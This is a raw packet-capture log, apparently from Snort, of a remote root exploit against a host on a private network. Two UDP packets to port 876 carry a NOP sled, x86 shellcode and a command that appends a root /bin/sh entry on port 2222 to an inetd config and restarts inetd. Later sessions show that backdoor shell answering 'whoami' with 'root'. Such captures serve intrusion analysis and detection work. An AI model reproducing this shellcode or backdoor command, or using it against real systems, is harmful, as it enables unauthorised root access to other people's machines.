TCP Options (3) => NOP NOP TS: 115105566 35242 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.909550 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x57 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1175 IpLen:20 DgmLen:73 DF ***AP*** Seq: 0xC9B2DA2B Ack: 0xCAAA5C1C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35244 115105566 6F 73 74 6E 61 6D 65 0A 76 69 63 74 69 6D 0A 62 ostname.victim.b 61 73 68 23 20 ash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.930082 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44548 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C1C Ack: 0xC9B2DA40 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105568 35244 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.621568 
0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x47 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44553 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCAAA5C1C Ack: 0xC9B2DA40 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105736 35244 71 75 69 74 0A quit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.621707 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1177 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA40 Ack: 0xCAAA5C21 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35415 115105736 71 q =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.640422 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44555 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C21 Ack: 0xC9B2DA41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105739 35415 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.640530 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x68 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1178 IpLen:20 DgmLen:90 DF ***AP*** Seq: 0xC9B2DA41 Ack: 0xCAAA5C21 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35417 115105739 75 69 74 0A 73 68 3A 20 71 75 69 74 3A 20 63 6F uit.sh: quit: co 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 0A mmand not found. 
62 61 73 68 23 20 bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:50.660397 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44557 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C21 Ack: 0xC9B2DA67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105741 35417 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.745348 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x47 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44563 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCAAA5C21 Ack: 0xC9B2DA67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105849 35417 65 78 69 74 0A exit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.745484 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1180 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA67 Ack: 0xCAAA5C26 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35528 115105849 65 e =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.746430 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4B 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1181 IpLen:20 DgmLen:61 DF ***AP**F Seq: 0xC9B2DA68 Ack: 0xCAAA5C26 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35528 115105849 78 69 74 0A 65 78 69 74 0A xit.exit. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.747199 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44564 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C26 Ack: 0xC9B2DA72 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105849 35528 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.748624 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44565 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xCAAA5C26 Ack: 0xC9B2DA72 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105849 35528 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:51.748648 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1182 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xC9B2DA72 Ack: 0xCAAA5C27 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35528 115105849 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:52.301233 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44567 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:57.310810 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44581 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 
46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF  F..F..F.........
FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74  .18 Jan 1998--st
72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E  r/bin/sh(-c)/bin
2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20  /echo '2222
20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20     stream  tcp
20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20     nowait  root
20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69     /bin/sh sh -i
27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F  '>> /tmp/h;/usr/
73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F  sbin/inetd /tmp/
68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF  h &#............
BF D2 F2 FF BF D2 F2 FF BF 00 00 00              ............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:05.156817 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4A
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44602 IpLen:20 DgmLen:60 DF
******S* Seq: 0xCC1DCDF4 Ack: 0x0 Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 115107190 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:05.157018 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4A
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1189 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xCC5BFCFC Ack: 0xCC1DCDF5 Win: 0x77C4 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 36869 115107190 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:05.157797 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44604 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC1DCDF5 Ack: 0xCC5BFCFD Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107191 36869
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:05.168630 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x48
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1190 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0xCC5BFCFD Ack: 0xCC1DCDF5 Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 36870 115107191
62 61 73 68 23 20                                bash#
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:05.171243 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44609 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC1DCDF5 Ack: 0xCC5BFD03 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107192 36870
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:06.712645 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4A
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44617 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0xCC1DCDF5 Ack: 0xCC5BFD03 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107346 36870
77 68 6F 61 6D 69 0D 0A                          whoami..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:06.712690 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1191 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC5BFD03 Ack: 0xCC1DCDFD Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37024 115107346
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:06.712820 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1192 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0xCC5BFD03 Ack: 0xCC1DCDFD Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37024 115107346
77                                               w
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:06.729857 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44619 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC1DCDFD Ack: 0xCC5BFD04 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107348 37024
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:06.729937 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x5A
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1193 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0xCC5BFD04 Ack: 0xCC1DCDFD Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37026 115107348
68 6F 61 6D 69 0A 72 6F 6F 74 0A 62 61 73 68 23  hoami.root.bash#
20 0A 62 61 73 68 23 20                           .bash#
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:06.749998 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44621 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC1DCDFD Ack: 0xCC5BFD1C Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107350 37026
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:08.013534 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x48
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44627 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0xCC1DCDFD Ack: 0xCC5BFD1C Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107475 37026
71 75 69 74 0D 0A                                quit..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:08.013648 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1195 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0xCC5BFD1C Ack: 0xCC1DCE03 Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37154 115107475
71                                               q
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:08.030262 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44630 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC1DCE03 Ack: 0xCC5BFD1D Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107478 37154
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:08.030363 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x6F
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1196 IpLen:20 DgmLen:97 DF
***AP*** Seq: 0xCC5BFD1D Ack: 0xCC1DCE03 Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37156 115107478
75 69 74 0A 73 68 3A 20 71 75 69 74 3A 20 63 6F  uit.sh: quit: co
6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 0A  mmand not found.
62 61 73 68 23 20 0A 62 61 73 68 23 20           bash# .bash#
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:08.050561 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44632 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCC1DCE03 Ack: 0xCC5BFD4A Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107480 37156
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:09.175488 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x48
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44637 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0xCC1DCE03 Ack: 0xCC5BFD4A Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 115107592 37156
65 78 69 74 0D 0A                                exit..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:09.175694 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1197 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0xCC5BFD4A Ack: 0xCC1DCE09 Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37271 115107592
65                                               e
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:09.176506 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1198 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0xCC5BFD54 Ack: 0xCC1DCE09 Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37271 115107592
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
